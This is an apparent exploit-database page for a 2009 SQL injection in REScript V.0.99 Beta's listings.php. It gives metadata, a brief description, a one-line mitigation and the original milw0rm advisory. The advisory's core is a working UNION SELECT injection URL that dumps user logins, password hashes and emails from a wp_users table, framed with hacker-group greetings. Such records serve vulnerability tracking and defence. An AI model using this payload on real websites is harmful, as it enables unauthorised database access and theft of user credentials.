Remote SQL Injection Vulnerability ( listings.php op )

vendor:

REScript

by:

Mr.SQL

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: REScript

Affected Version From: REScript V.0.99 Beta

Affected Version To: REScript V.0.99 Beta

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Remote SQL Injection Vulnerability ( listings.php op )

A vulnerability in the REScript V.0.99 Beta web application allows an attacker to inject arbitrary SQL commands via the 'op' parameter in the 'listings.php' script. This can be exploited to gain access to the database and to disclose sensitive information such as user credentials.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

###############################################################
#################### Viva IslaM Viva IslaM ####################
##
## Remote SQL Injection Vulnerability ( listings.php op )
##
## REScript V.0.99 Beta
##
## http://www.ebigman.com/
##
###############################################################
###############################################################
##
## AuTh0r : Mr.SQL
##
## H0ME   : WwW.55a.NeT
##
## Email  : SQL@Hotmail.iT
##
########################
########################
##
## -[[: ExploiteS :]]-
##
## www.TraGeT.CoM/REScript/listings.php?op=details&id=-1+UNION+SELECT+0,0,0,0,0,CONCAT_WS(0x3a,user_login,user_pass,user_email),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+wp_users--
##
########################
########################
 
 
 
#########################################################################################################
#########################################################################################################
                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
                                        
:: HaCkEr_EGy :: Dark MaSTer  :: His0k4 :: User-Ma$keN :: ALwHeD :: Ghost Hacker :: MuslimS HaCkErS ::
#########################################################################################################
######################################################################################################### 

# milw0rm.com [2009-08-31]